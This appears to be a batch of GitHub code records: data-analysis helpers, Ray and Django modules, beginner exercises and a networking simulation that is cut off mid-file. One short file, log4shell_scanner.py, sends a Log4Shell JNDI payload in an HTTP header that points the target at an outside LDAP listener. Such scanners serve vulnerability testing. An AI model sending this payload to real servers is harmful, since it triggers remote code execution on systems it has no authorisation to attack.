+{"seq_id":"6595673622","text":"import pandas as pd\nimport os.path as path\n\n\ndef set_pandas_option():\n pd.set_option('display.max_columns', None)\n pd.set_option('display.max_rows', None)\n pd.set_option('display.width', 10000)\n pd.set_option('max_colwidth', 100)\n\n\ndef compress_read(f) -> pd.DataFrame:\n parquet_file = f.replace('.csv', '.parquet')\n if str(f).endswith('.csv') and path.exists(f):\n pd.read_csv(f).to_parquet(parquet_file, compression='brotli')\n return pd.read_parquet(parquet_file)\n\n\ndef df_statistic(df: pd.DataFrame) -> pd.DataFrame:\n stats = []\n for col in df.columns:\n stats.append({\n 'Feature': col,\n 'Type': df[col].dtype,\n 'Unique Values': df[col].nunique(),\n 'Not Null Count': df.shape[0] - df[col].isnull().sum(),\n 'Null Value Percentage': df[col].isnull().sum() * 100.0 / df.shape[0],\n 'Biggest Category Percentage': df[col].value_counts(normalize=True, dropna=False).values[0] * 100.0\n })\n return pd.DataFrame(stats)\n\n\ndef df_hist(df: pd.DataFrame):\n import matplotlib.pyplot as plt\n df.hist(bins=50, figsize=(20, 15), column=5)\n plt.savefig('plots/hist.png', dpi=600)\n plt.show()\n","repo_name":"kun368/kaggle-code-v2","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36737699280","text":"import sys\nsys.setrecursionlimit(10000000)\ninput=lambda : sys.stdin.readline().rstrip()\n\nn,m=map(int,input().split())\nclass UnionFind:\n def __init__(self, n):\n self.data=[-1 for i in range(n)]\n\n def root(self,x):\n if self.data[x]<0:\n return x\n else:\n self.data[x]=self.root(self.data[x])\n return self.data[x]\n\n def uni(self,x,y):\n x=self.root(x)\n y=self.root(y)\n if(x==y):\n return\n if self.data[y] \n\nimport sys\nimport requests\n\nvuln_webserver = sys.argv[1]\nlistener_ip = sys.argv[2]\n\ns = requests.Session()\ns.headers = {'X-Api-Version': r'${jndi:ldap://%s:1389/Exploit}'%listener_ip}\ntry:\n print(f\"probing {vuln_webserver}...\")\n r = s.get(f\"{vuln_webserver}\", verify=False, timeout=1)\n print(r.text)\nexcept Exception as e:\n print (e.text)\n\ns.close()","repo_name":"gr4ysku11/log4shell_scanner","sub_path":"log4shell_scanner.py","file_name":"log4shell_scanner.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"71562929697","text":"str\nphantom = \"Phantom of the\"\nmovie = phantom + \" opera\"\nsingle_char = \"c\"\nsingle_quotes = 'hello world'\nempty_string = ''\n\n\n\n\nint\nnumber1 = 3\nnumber2 = 1002\nnumber2 = number2 + 1\nnumber3 = number1 + number2\nnum4 = number1 * 14 \nnum5 = 10 - 2\nnegative_number = -3\nzero = 0\n\n\nfloat\nf_number = 0.3\nf_number2 = -6.4\nanother_zero = 0.0\nlooks_like_int = 3.0\n\nbool\nboolean1 = True\nb2 = False\nb3 = (4 < 6)\nb43 = (3.2 >= 100.2)\n\n\nnothing = None\n\n# var output\nprint(-34)\nprint(0.56)\nprint(10+1)\nprint(True)\nprint(\"hello world\")\nprint(some_value)\nprint(\"my age is\", age)","repo_name":"dannteMich/python_course","sub_path":"lesson_01/02_types/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72960562338","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\n\nfrom maio.models import Media\n\n@login_required\ndef dashboard(request):\n cd = {}\n width = 260\n images = list(Media.get_all_images(request))\n for image in images:\n if image.tn_width > image.tn_height:\n x = width * image.tn_width / image.tn_height\n margin = int(width - x) // 2\n image.margin_left = margin\n image.margin_top = 0\n else:\n y = width * image.tn_height / image.tn_width\n margin = int(width - y) // 2\n image.margin_top = margin\n image.margin_left = 0\n cd['width'] = 260\n cd['images'] = images\n return render(request, 'maio/dashboard.html', cd)\n","repo_name":"jonmsawyer/maio","sub_path":"maio/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36396752452","text":"from abc import ABC, abstractmethod\nimport copy\nfrom dataclasses import dataclass\nimport itertools\nfrom typing import Callable, List, Iterator, Any, Dict, Optional, Union\n\nimport ray\nfrom ray.data.block import (\n Block,\n BlockAccessor,\n BlockMetadata,\n BlockExecStats,\n)\nfrom ray.data._internal.compute import (\n ComputeStrategy,\n TaskPoolStrategy,\n ActorPoolStrategy,\n)\nfrom ray.data._internal.execution.interfaces import (\n RefBundle,\n ExecutionOptions,\n ExecutionResources,\n PhysicalOperator,\n TaskContext,\n MapTransformFn,\n)\nfrom ray.data._internal.memory_tracing import trace_allocation\nfrom ray.data._internal.stats import StatsDict\nfrom ray.util.scheduling_strategies import NodeAffinitySchedulingStrategy\nfrom ray.types import ObjectRef\nfrom ray._raylet import ObjectRefGenerator\n\n\nclass MapOperator(PhysicalOperator, ABC):\n \"\"\"A streaming operator that maps input bundles 1:1 to output bundles.\n\n This operator implements the distributed map operation, supporting both task\n and actor compute strategies.\n \"\"\"\n\n def __init__(\n self,\n transform_fn: MapTransformFn,\n input_op: PhysicalOperator,\n name: str,\n min_rows_per_bundle: Optional[int],\n ray_remote_args: Optional[Dict[str, Any]],\n ):\n # NOTE: This constructor should not be called directly; use MapOperator.create()\n # instead.\n # NOTE: This constructor must be called by subclasses.\n\n self._transform_fn = transform_fn\n self._ray_remote_args = _canonicalize_ray_remote_args(ray_remote_args or {})\n self._ray_remote_args_factory = None\n\n # Bundles block references up to the min_rows_per_bundle target.\n self._block_ref_bundler = _BlockRefBundler(min_rows_per_bundle)\n # Object store allocation stats.\n self._metrics = _ObjectStoreMetrics(alloc=0, freed=0, cur=0, peak=0)\n\n # Queue for task outputs, either ordered or unordered (this is set by start()).\n self._output_queue: _OutputQueue = None\n # Output metadata, added to on get_next().\n self._output_metadata: List[BlockMetadata] = []\n\n super().__init__(name, [input_op])\n\n @classmethod\n def create(\n cls,\n transform_fn: MapTransformFn,\n input_op: PhysicalOperator,\n init_fn: Optional[Callable[[], None]] = None,\n name: str = \"Map\",\n # TODO(ekl): slim down ComputeStrategy to only specify the compute\n # config and not contain implementation code.\n compute_strategy: Optional[ComputeStrategy] = None,\n min_rows_per_bundle: Optional[int] = None,\n ray_remote_args: Optional[Dict[str, Any]] = None,\n ) -> \"MapOperator\":\n \"\"\"Create a MapOperator.\n\n This factory creates the MapOperator pool implementation that corresponds to the\n compute argument:\n - If None or TaskPoolStrategy -> TaskPoolMapOperator\n - If ActorPoolStrategy -> ActorPoolMapOperator\n\n Args:\n transform_fn: The function to apply to each ref bundle input.\n input_op: Operator generating input data for this op.\n init_fn: The callable class to instantiate if using ActorPoolMapOperator.\n name: The name of this operator.\n compute_strategy: Customize the compute strategy for this op.\n min_rows_per_bundle: The number of rows to gather per batch passed to the\n transform_fn, or None to use the block size. Setting the batch size is\n important for the performance of GPU-accelerated transform functions.\n The actual rows passed may be less if the dataset is small.\n ray_remote_args: Customize the ray remote args for this op's tasks.\n \"\"\"\n if compute_strategy is None:\n compute_strategy = TaskPoolStrategy()\n\n if isinstance(compute_strategy, TaskPoolStrategy):\n from ray.data._internal.execution.operators.task_pool_map_operator import (\n TaskPoolMapOperator,\n )\n\n return TaskPoolMapOperator(\n transform_fn,\n input_op,\n name=name,\n min_rows_per_bundle=min_rows_per_bundle,\n ray_remote_args=ray_remote_args,\n )\n elif isinstance(compute_strategy, ActorPoolStrategy):\n from ray.data._internal.execution.operators.actor_pool_map_operator import (\n ActorPoolMapOperator,\n AutoscalingConfig,\n AutoscalingPolicy,\n )\n\n autoscaling_config = AutoscalingConfig.from_compute_strategy(\n compute_strategy\n )\n autoscaling_policy = AutoscalingPolicy(autoscaling_config)\n\n if init_fn is None:\n\n def init_fn():\n pass\n\n return ActorPoolMapOperator(\n transform_fn,\n init_fn,\n input_op,\n autoscaling_policy=autoscaling_policy,\n name=name,\n min_rows_per_bundle=min_rows_per_bundle,\n ray_remote_args=ray_remote_args,\n )\n else:\n raise ValueError(f\"Unsupported execution strategy {compute_strategy}\")\n\n def start(self, options: \"ExecutionOptions\"):\n super().start(options)\n # Create output queue with desired ordering semantics.\n if options.preserve_order:\n self._output_queue = _OrderedOutputQueue()\n else:\n self._output_queue = _UnorderedOutputQueue()\n\n if options.locality_with_output:\n if isinstance(options.locality_with_output, list):\n locs = options.locality_with_output\n else:\n locs = [ray.get_runtime_context().get_node_id()]\n\n class RoundRobinAssign:\n def __init__(self, locs):\n self.locs = locs\n self.i = 0\n\n def __call__(self, args):\n args = copy.deepcopy(args)\n args[\"scheduling_strategy\"] = NodeAffinitySchedulingStrategy(\n self.locs[self.i],\n soft=True,\n _spill_on_unavailable=True,\n )\n self.i += 1\n self.i %= len(self.locs)\n return args\n\n self._ray_remote_args_factory = RoundRobinAssign(locs)\n\n # Put the function def in the object store to avoid repeated serialization\n # in case it's large (i.e., closure captures large objects).\n self._transform_fn_ref = ray.put(self._transform_fn)\n\n def add_input(self, refs: RefBundle, input_index: int):\n assert input_index == 0, input_index\n # Add ref bundle allocation to operator's object store metrics.\n self._metrics.cur += refs.size_bytes()\n if self._metrics.cur > self._metrics.peak:\n self._metrics.peak = self._metrics.cur\n # Add RefBundle to the bundler.\n self._block_ref_bundler.add_bundle(refs)\n if self._block_ref_bundler.has_bundle():\n # If the bundler has a full bundle, add it to the operator's task submission\n # queue.\n bundle = self._block_ref_bundler.get_next_bundle()\n self._add_bundled_input(bundle)\n\n def _get_runtime_ray_remote_args(self) -> Dict[str, Any]:\n if self._ray_remote_args_factory:\n return self._ray_remote_args_factory(self._ray_remote_args)\n return self._ray_remote_args\n\n @abstractmethod\n def _add_bundled_input(self, refs: RefBundle):\n \"\"\"Add a pre-bundled upstream output to this operator.\n\n Unlike the add_input() arg, this RefBundle has already been further bundled by\n _block_ref_bundler up to the target size, meaning that this bundle is ready for\n task submission.\n\n This must be implemented by subclasses.\n\n Args:\n refs: The fully-bundled ref bundle that should be added as input.\n \"\"\"\n raise NotImplementedError\n\n def _handle_task_submitted(self, task: \"_TaskState\"):\n \"\"\"Handle a newly submitted task, notifying the output queue and updating\n object store metrics.\n\n This should be called by subclasses right after a task is submitted.\n\n Args:\n task: The task state for the newly submitted task.\n \"\"\"\n # Notify output queue that this task is pending.\n self._output_queue.notify_pending_task(task)\n\n @abstractmethod\n def notify_work_completed(\n self, ref: Union[ObjectRef[ObjectRefGenerator], ray.ObjectRef]\n ):\n \"\"\"Indicates that a task is done executing OR that a worker is done starting.\n\n This must be implemented by subclasses.\n\n Args:\n ref: The output ref for the task that's done or the worker that has\n been started.\n \"\"\"\n raise NotImplementedError\n\n def _handle_task_done(self, task: \"_TaskState\"):\n \"\"\"Handle a newly completed task, notifying the output queue, freeing task\n inputs, and updating object store metrics.\n\n This should be called by subclasses right after a task completes.\n\n Args:\n task: The task state for the newly completed task.\n \"\"\"\n # Notify output queue that this task is complete.\n self._output_queue.notify_task_completed(task)\n task.inputs.destroy_if_owned()\n # Update object store metrics.\n allocated = task.output.size_bytes()\n self._metrics.alloc += allocated\n self._metrics.cur += allocated\n freed = task.inputs.size_bytes()\n self._metrics.freed += freed\n self._metrics.cur -= freed\n if self._metrics.cur > self._metrics.peak:\n self._metrics.peak = self._metrics.cur\n\n def inputs_done(self):\n self._block_ref_bundler.done_adding_bundles()\n if self._block_ref_bundler.has_bundle():\n # Handle any leftover bundles in the bundler.\n bundle = self._block_ref_bundler.get_next_bundle()\n self._add_bundled_input(bundle)\n super().inputs_done()\n\n def has_next(self) -> bool:\n assert self._started\n return self._output_queue.has_next()\n\n def get_next(self) -> RefBundle:\n assert self._started\n bundle = self._output_queue.get_next()\n self._metrics.cur -= bundle.size_bytes()\n for _, meta in bundle.blocks:\n self._output_metadata.append(meta)\n return bundle\n\n @abstractmethod\n def get_work_refs(\n self,\n ) -> List[Union[ObjectRef[ObjectRefGenerator], ray.ObjectRef]]:\n raise NotImplementedError\n\n @abstractmethod\n def num_active_work_refs(self) -> int:\n raise NotImplementedError\n\n @abstractmethod\n def progress_str(self) -> str:\n raise NotImplementedError\n\n def get_metrics(self) -> Dict[str, int]:\n return self._metrics.to_metrics_dict()\n\n def get_stats(self) -> StatsDict:\n return {self._name: self._output_metadata}\n\n def get_transformation_fn(self) -> MapTransformFn:\n return self._transform_fn\n\n @abstractmethod\n def shutdown(self):\n # NOTE: This must be implemented by subclasses, and those overriding methods\n # must call this method.\n super().shutdown()\n\n @abstractmethod\n def current_resource_usage(self) -> ExecutionResources:\n raise NotImplementedError\n\n @abstractmethod\n def base_resource_usage(self) -> ExecutionResources:\n raise NotImplementedError\n\n @abstractmethod\n def incremental_resource_usage(self) -> ExecutionResources:\n raise NotImplementedError\n\n @staticmethod\n def _map_ref_to_ref_bundle(ref: ObjectRef[ObjectRefGenerator]) -> RefBundle:\n \"\"\"Utility for converting a generator ref to a RefBundle.\n\n This function blocks on the completion of the underlying generator task via\n ray.get().\n \"\"\"\n all_refs = list(ray.get(ref))\n del ref\n block_refs = all_refs[:-1]\n block_metas = ray.get(all_refs[-1])\n assert len(block_metas) == len(block_refs), (block_refs, block_metas)\n for ref in block_refs:\n trace_allocation(ref, \"map_operator_work_completed\")\n return RefBundle(list(zip(block_refs, block_metas)), owns_blocks=True)\n\n\n@dataclass\nclass _TaskState:\n \"\"\"Tracks the driver-side state for an MapOperator task.\n\n Attributes:\n inputs: The input ref bundle.\n output: The output ref bundle that is set when the task completes.\n \"\"\"\n\n inputs: RefBundle\n output: Optional[RefBundle] = None\n\n\n@dataclass\nclass _ObjectStoreMetrics:\n \"\"\"Metrics for object store memory allocations.\"\"\"\n\n alloc: int\n freed: int\n cur: int\n peak: int\n\n def to_metrics_dict(self) -> Dict[str, int]:\n return {\n \"obj_store_mem_alloc\": self.alloc,\n \"obj_store_mem_freed\": self.freed,\n \"obj_store_mem_peak\": self.peak,\n }\n\n\ndef _map_task(\n fn: MapTransformFn,\n ctx: TaskContext,\n *blocks: Block,\n) -> Iterator[Union[Block, List[BlockMetadata]]]:\n \"\"\"Remote function for a single operator task.\n\n Args:\n fn: The callable that takes Iterator[Block] as input and returns\n Iterator[Block] as output.\n blocks: The concrete block values from the task ref bundle.\n\n Returns:\n A generator of blocks, followed by the list of BlockMetadata for the blocks\n as the last generator return.\n \"\"\"\n output_metadata = []\n stats = BlockExecStats.builder()\n for b_out in fn(iter(blocks), ctx):\n # TODO(Clark): Add input file propagation from input blocks.\n m_out = BlockAccessor.for_block(b_out).get_metadata([], None)\n m_out.exec_stats = stats.build()\n output_metadata.append(m_out)\n yield b_out\n stats = BlockExecStats.builder()\n yield output_metadata\n\n\nclass _BlockRefBundler:\n \"\"\"Rebundles RefBundles to get them close to a particular number of rows.\"\"\"\n\n def __init__(self, min_rows_per_bundle: Optional[int]):\n \"\"\"Creates a BlockRefBundler.\n\n Args:\n min_rows_per_bundle: The target number of rows per bundle. Note that we\n bundle up to this target, but only exceed it if not doing so would\n result in an empty bundle.\n \"\"\"\n self._min_rows_per_bundle = min_rows_per_bundle\n self._bundle_buffer: List[RefBundle] = []\n self._bundle_buffer_size = 0\n self._finalized = False\n\n def add_bundle(self, bundle: RefBundle):\n \"\"\"Add a bundle to the bundler.\"\"\"\n self._bundle_buffer.append(bundle)\n self._bundle_buffer_size += self._get_bundle_size(bundle)\n\n def has_bundle(self) -> bool:\n \"\"\"Returns whether the bundler has a bundle.\"\"\"\n return self._bundle_buffer and (\n self._min_rows_per_bundle is None\n or self._bundle_buffer_size >= self._min_rows_per_bundle\n or (self._finalized and self._bundle_buffer_size > 0)\n )\n\n def get_next_bundle(self) -> RefBundle:\n \"\"\"Gets the next bundle.\"\"\"\n assert self.has_bundle()\n if self._min_rows_per_bundle is None:\n # Short-circuit if no bundle row target was defined.\n assert len(self._bundle_buffer) == 1\n bundle = self._bundle_buffer[0]\n self._bundle_buffer = []\n self._bundle_buffer_size = 0\n return bundle\n leftover = []\n output_buffer = []\n output_buffer_size = 0\n buffer_filled = False\n for bundle in self._bundle_buffer:\n bundle_size = self._get_bundle_size(bundle)\n if buffer_filled:\n # Buffer has been filled, save it in the leftovers.\n leftover.append(bundle)\n elif (\n output_buffer_size + bundle_size <= self._min_rows_per_bundle\n or output_buffer_size == 0\n ):\n # Bundle fits in buffer, or bundle doesn't fit but the buffer still\n # needs a non-empty bundle.\n output_buffer.append(bundle)\n output_buffer_size += bundle_size\n else:\n # Bundle doesn't fit in a buffer that already has at least one non-empty\n # bundle, so we add it to the leftovers.\n leftover.append(bundle)\n # Add all remaining bundles to the leftovers.\n buffer_filled = True\n self._bundle_buffer = leftover\n self._bundle_buffer_size = sum(\n self._get_bundle_size(bundle) for bundle in leftover\n )\n return _merge_ref_bundles(*output_buffer)\n\n def done_adding_bundles(self):\n \"\"\"Indicate that no more RefBundles will be added to this bundler.\"\"\"\n self._finalized = True\n\n @staticmethod\n def _get_bundle_size(bundle: RefBundle):\n return bundle.num_rows() if bundle.num_rows() is not None else float(\"inf\")\n\n\ndef _merge_ref_bundles(*bundles: RefBundle) -> RefBundle:\n \"\"\"Merge N ref bundles into a single bundle of multiple blocks.\"\"\"\n # Check that at least one bundle is non-null.\n assert any(bundle is not None for bundle in bundles)\n blocks = list(\n itertools.chain(\n block for bundle in bundles if bundle is not None for block in bundle.blocks\n )\n )\n owns_blocks = all(bundle.owns_blocks for bundle in bundles if bundle is not None)\n return RefBundle(blocks, owns_blocks)\n\n\nclass _OutputQueue:\n \"\"\"Interface for swapping between different output order modes.\"\"\"\n\n def notify_pending_task(self, task: _TaskState):\n \"\"\"Called when a new task becomes pending.\"\"\"\n pass\n\n def notify_task_completed(self, task: _TaskState):\n \"\"\"Called when a previously pending task completes.\"\"\"\n pass\n\n def has_next(self) -> bool:\n raise NotImplementedError\n\n def get_next(self) -> RefBundle:\n raise NotImplementedError\n\n\nclass _OrderedOutputQueue(_OutputQueue):\n \"\"\"An queue that returns finished tasks in submission order.\"\"\"\n\n def __init__(self):\n self._tasks_by_output_order: Dict[int, _TaskState] = {}\n self._next_task_index: int = 0\n self._next_output_index: int = 0\n\n def notify_pending_task(self, task: _TaskState):\n self._tasks_by_output_order[self._next_task_index] = task\n self._next_task_index += 1\n\n def has_next(self) -> bool:\n i = self._next_output_index\n return (\n i in self._tasks_by_output_order\n and self._tasks_by_output_order[i].output is not None\n )\n\n def get_next(self) -> RefBundle:\n # Get the output RefBundle for the current task.\n out_bundle = self._tasks_by_output_order[self._next_output_index].output\n # Pop out the next single-block bundle.\n next_bundle = RefBundle(\n [out_bundle.blocks.pop(0)], owns_blocks=out_bundle.owns_blocks\n )\n if not out_bundle.blocks:\n # If this task's RefBundle is exhausted, move to the next one.\n del self._tasks_by_output_order[self._next_output_index]\n self._next_output_index += 1\n return next_bundle\n\n\nclass _UnorderedOutputQueue(_OutputQueue):\n \"\"\"An queue that does not guarantee output order of finished tasks.\"\"\"\n\n def __init__(self):\n self._completed_tasks: List[_TaskState] = []\n\n def notify_task_completed(self, task: _TaskState):\n self._completed_tasks.append(task)\n\n def has_next(self) -> bool:\n return len(self._completed_tasks) > 0\n\n def get_next(self) -> RefBundle:\n # Get the output RefBundle for the oldest completed task.\n out_bundle = self._completed_tasks[0].output\n # Pop out the next single-block bundle.\n next_bundle = RefBundle(\n [out_bundle.blocks.pop(0)], owns_blocks=out_bundle.owns_blocks\n )\n if not out_bundle.blocks:\n # If this task's RefBundle is exhausted, move to the next one.\n del self._completed_tasks[0]\n return next_bundle\n\n\ndef _canonicalize_ray_remote_args(ray_remote_args: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Enforce rules on ray remote args for map tasks.\n\n Namely, args must explicitly specify either CPU or GPU, not both. Disallowing\n mixed resources avoids potential starvation and deadlock issues during scheduling,\n and should not be a serious limitation for users.\n \"\"\"\n ray_remote_args = ray_remote_args.copy()\n if \"num_cpus\" not in ray_remote_args and \"num_gpus\" not in ray_remote_args:\n ray_remote_args[\"num_cpus\"] = 1\n if ray_remote_args.get(\"num_gpus\", 0) > 0:\n if ray_remote_args.get(\"num_cpus\", 0) != 0:\n raise ValueError(\n \"It is not allowed to specify both num_cpus and num_gpus for map tasks.\"\n )\n elif ray_remote_args.get(\"num_cpus\", 0) > 0:\n if ray_remote_args.get(\"num_gpus\", 0) != 0:\n raise ValueError(\n \"It is not allowed to specify both num_cpus and num_gpus for map tasks.\"\n )\n return ray_remote_args\n","repo_name":"usborn116/espn-nba-trade-helper","sub_path":"venv/lib/python3.8/site-packages/ray/data/_internal/execution/operators/map_operator.py","file_name":"map_operator.py","file_ext":"py","file_size_in_byte":21223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36920430892","text":"from django.shortcuts import render, HttpResponse\nfrom django.http import JsonResponse\nimport random\nimport string\nfrom register.models import Resume\nfrom register.forms import resumeForm\nimport os \ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef isValid():\n\treturn True\ndef createUser(req):\n\tif req.method == 'POST':\n\t\tform=resumeForm(req.POST)\n\t\tprint(\"Her\")\n\t\tus = req.POST.get(\"username\",\"\")\n\t\tna = req.POST.get(\"name\",\"\")\n\t\tag = req.POST.get(\"age\",\"\")\n\t\tco = req.POST.get(\"contactNum\",\"\")\n\t\tem = req.POST.get(\"email\",\"\")\n\t\tar = req.POST.get(\"areaOfExpertise\",\"\")\n\t\tad = req.POST.get(\"address\",\"\")\n\t\tci = req.POST.get(\"city\",\"\")\n\t\tst = req.POST.get(\"state\",\"\")\n\t\tpr = req.POST.get(\"prefferedLocation\",\"\")\n\t\tqu = req.POST.get(\"qualification\",\"\")\n\t\tte = req.POST.get(\"teachingExperience\",\"\")\n\t\tcu = req.POST.get(\"currentSchool\",\"\")\n\t\tif isValid:\n\t\t\n\t\t\ttry:\n\t\t\t\tq=Resume(username=us,name=na,age=ag,contactNum=co,email = em,areaOfExpertise = ar,address = ad,city = ci,state = st,prefferedLocation = pr,qualification = qu,teachingExperience = te,currentSchool =cu)\n\t\t\t\tq.save()\n\t\t\t\treturn render(req, 'signUp.htm', {'user_obj': q,'is_registered':True })\n\t\t\texcept:\n\t\t\t\traise\n\t\t\t\treturn HttpResponse(\"error\")\n\telse:\n\t\tform = resumeForm() # an unboundform\n\t\treturn render(req,'signUp.htm', {'form': form})","repo_name":"chanchurbansal/DjangoLoginAuthAPI","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24243044627","text":"import json\n\nif __name__ == \"__main__\":\n json_data = json.load(open('submit-6-16.segm.json', 'r'))\n for i, data in enumerate(json_data):\n if data['category_id'] == 3:\n json_data[i]['category_id'] = 5\n if data['category_id'] == 5:\n json_data[i]['category_id'] = 3\n json.dump(json_data, open('revised-submit-6-16.segm.json', 'w'))","repo_name":"zwl-max/mouth_Instance_Segement","sub_path":"code/tools/revise_json.py","file_name":"revise_json.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"33730680091","text":"import time\nimport socket\nimport threading\nimport json\nimport random\n\n\nclass BattleGround:\n def __init__(self, _x, _y):\n self.x = _x\n self.y = _y\n\nTTL = 1000\np = 1.1\nt = 0\n\nclass TableEntry:\n def __init__(self, _key, _nxt_hop, _time_to_live, _seq_num ):\n self.key = _key\n self.nxt_hop = _nxt_hop\n self.time_to_live = _time_to_live\n self.seq_num = _seq_num\n\n def print_entry(self):\n print(\"key: \" + str(self.key) + \" next hop: \" + str(self.nxt_hop))\n\nclass Message:\n def __init__(self, nid, type, value):\n self.nid = nid\n self.type = type # hello , hello_ack , Message\n self.value = value\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nclass Vehicle:\n def __init__(self, _id, _x, _y, _ip, _port, _delay, _server_ip, _server_port, _battle_ground, _n):\n self.id = _id\n self.x = _x\n self.y = _y\n self.ip = _ip\n self.port = _port\n self.server_ip = _server_ip\n self.server_port = _server_port\n self.server_conn = []\n self.battle_ground = _battle_ground\n self.delay = _delay\n self.n = _n\n self.route_table = []\n self.init_finish = False\n self.nbrs = []\n self.rrq_received = []\n self.rrq_counter = 1\n\n self.recently_sent = [0]\n\n main_thread = threading.Thread(target=self.main, args=())\n main_thread.daemon = True\n main_thread.start()\n\n def main(self):\n\n server_thread = threading.Thread(target=self.listen_to_server, args=())\n server_thread.daemon = True\n server_thread.start()\n\n time.sleep(0.25 * self.n)\n\n connect_thread = threading.Thread(target=self.connect_to_server, args=())\n connect_thread.daemon = True\n connect_thread.start()\n\n def delayed_send(self, msg):\n self.recently_sent[0] = msg\n\n byte_array = json.dumps(msg.__dict__).encode(\"utf-8\")\n time.sleep(self.delay)\n self.server_conn[0].send(byte_array)\n\n def connect_to_server(self):\n\n client_socket = socket.socket()\n client_socket.connect((self.server_ip, self.server_port))\n self.server_conn.append(client_socket)\n\n hello_thread = threading.Thread(target=self.hello, args=())\n hello_thread.daemon = True\n hello_thread.start()\n\n def listen_to_server(self):\n server_socket = socket.socket()\n server_socket.bind((self.ip, self.port))\n server_socket.listen(2)\n conn, address = server_socket.accept()\n while True:\n data = conn.recv(1024)\n if not data:\n break\n else:\n msg_rec = Message(**json.loads(data, encoding=\"utf-8\"))\n\n if msg_rec.type == \"hello\":\n m = Message(str(self.id), \"hello_ack\", msg_rec.nid)\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"hello_ack\":\n self.route_table.append(TableEntry(int(msg_rec.nid), int(msg_rec.nid), TTL, 0 ))\n print(\"update \" + str(self.id) + \" Routing table of node \" + str(self.id))\n\n elif msg_rec.type == \"init_finish\":\n self.init_finish = True\n\n elif msg_rec.type == \"RRQ\":\n # destination ----------- counter\n tmp2 = msg_rec.value.split(\"+\")\n # current hop --------- source\n tmp3 = msg_rec.nid.split(\"+\")\n\n # check for duplicate rrq\n found = False\n for item4 in self.rrq_received:\n if item4[0] == tmp3[1] and item4[1] == tmp2[0] and item4[2] == tmp2[1]:\n found = True\n break\n if found:\n continue\n else:\n # source -------------- destination ----------- counter\n self.rrq_received.append([tmp3[1], tmp2[0], tmp2[1]])\n\n # update routing\n founded = False\n for item7 in self.route_table:\n if str(item7.key) == str(tmp3[1]):\n founded = True\n break\n if founded:\n pass\n else:\n self.route_table.append(TableEntry(int(tmp3[1]), int(tmp3[0]), TTL, int(tmp2[1])))\n print(\"update \" + str(self.id) + \" Routing table of node \" + str(self.id))\n\n # check if dst\n rrp = 0\n if int(tmp2[0]) == self.id:\n rrp = self.id\n # in routing table\n for item5 in self.route_table:\n if item5.key == int(tmp2[0]):\n rrp = item5.nxt_hop\n if rrp:\n # relay back rrp\n # current --------------- next hop ---------------- source -------------- destination\n m = Message(str(self.id) + \"+\" + str(tmp3[0]), \"RRP\", str(tmp3[1]) + \"+\" + str(tmp2[0]))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n else:\n # rebroadcast RRQ\n m = Message(str(self.id) + \"+\" + str(tmp3[1]), \"RRQ\", msg_rec.value)\n self.rrq_counter = self.rrq_counter + 1\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"RRP\":\n tmp2 = msg_rec.value.split(\"+\")\n\n # add to routing table\n\n already_existed = False\n for item5 in self.route_table:\n if item5.key == int(tmp2[1]):\n already_existed = True\n if already_existed:\n pass\n else:\n self.route_table.append(TableEntry(int(tmp2[1]), int(msg_rec.nid), TTL, 0))\n print(\"update \" + str(self.id) + \" Routing table of node \" + str(self.id))\n\n # if source, send message, else relay back\n if int(tmp2[0]) == self.id:\n pass\n else:\n # search in routing table\n tmp4 = 0\n for item5 in self.route_table:\n if item5.key == int(tmp2[0]):\n tmp4 = item5.nxt_hop\n\n # relay back rrp\n m = Message(str(self.id) + \"+\" + str(tmp4), \"RRP\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"Message\":\n # check if that is its own\n tmp2 = msg_rec.nid.split(\"+\")\n # --------- source ------- prev hop ----- destination ------\n # update routing table for prev and source node\n\n # check\n if int(tmp2[2]) == self.id: # msg reached dst\n print(\"receive \" + tmp2[2] + \" \" + msg_rec.value)\n\n global t\n elapsed = time.time() - t\n print(elapsed)\n\n else:\n # search in routing table\n founded = False\n\n tmp3 = 0\n for item2 in self.route_table:\n if str(item2.key) == tmp2[2]:\n founded = True\n tmp3 = item2.nxt_hop\n break\n\n if founded:\n # relay to next hop\n # --------- source -------------- next hop ------------ destination ------ current hop\n m = Message(str(tmp2[0]) + \"+\" + str(tmp3 ) + \"+\" + tmp2[2] + \"+\" + str(self.id), \"Message\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n else:\n pass\n\n elif msg_rec.type == \"drop\":\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([self.recently_sent[0]]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Resend\")\n\n def hello(self):\n\n m = Message(str(self.id), 